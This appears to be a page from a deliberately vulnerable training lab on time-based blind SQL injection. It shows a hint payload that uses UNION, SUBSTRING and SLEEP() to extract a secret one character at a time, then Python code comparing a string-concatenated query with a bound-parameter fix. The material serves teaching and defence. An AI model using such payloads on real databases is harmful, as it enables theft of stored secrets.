Blind SQLi (time-based)

/blind-time · sink: string-concatenated SELECT (no response variation)

Username availability returns identical responses; only query time leaks.


Hint

Query: SELECT username FROM users WHERE username='<input>' LIMIT 1

The response is the same string either way. Use SLEEP() inside a UNION or AND clause:

nonexistent' UNION SELECT IF(SUBSTRING((SELECT value FROM secrets WHERE name='sqli-blind-time'),1,1)='V', SLEEP(2), 'x')--
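Fix for this sink, as an added example (not the lab's own source): the string-concatenated lookup beside a bound-parameter version, run against a constructed in-memory SQLite table. The function names, the table contents and the use of SQLite are assumptions. SQLite has no SLEEP() and the demo database has no secrets table, so the hint's payload only shows whether the input reaches the SQL parser.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's users table (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY)")
    db.execute("INSERT INTO users VALUES ('alice')")
    return db

def is_taken_concat(db, username):
    # Vulnerable shape from the page: the input is spliced into the SQL text,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = "SELECT username FROM users WHERE username='" + username + "' LIMIT 1"
    return db.execute(sql).fetchone() is not None

def is_taken_bound(db, username):
    # Hardened shape: the statement text is constant and the input is bound
    # as a value, so it is only ever compared against the column.
    sql = "SELECT username FROM users WHERE username = ? LIMIT 1"
    return db.execute(sql, (username,)).fetchone() is not None

def reaches_parser(db, lookup, username):
    # True when the engine rejects the statement at prepare time, which can
    # only happen if part of the input was interpreted as SQL.
    try:
        lookup(db, username)
        return False
    except sqlite3.OperationalError:
        return True

# The hint's payload, copied from the page.
PAGE_PAYLOAD = (
    "nonexistent' UNION SELECT IF(SUBSTRING((SELECT value FROM secrets "
    "WHERE name='sqli-blind-time'),1,1)='V', SLEEP(2), 'x')--"
)

if __name__ == "__main__":
    db = make_db()
    print("concat parses input as SQL:", reaches_parser(db, is_taken_concat, PAGE_PAYLOAD))
    print("bound parses input as SQL: ", reaches_parser(db, is_taken_bound, PAGE_PAYLOAD))
    print("bound lookup of alice:     ", is_taken_bound(db, "alice"))
```

With the bound version the payload is an ordinary (unregistered) username, so the database does constant work for it and query time no longer depends on the secret.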

View source → · /meta/blind-time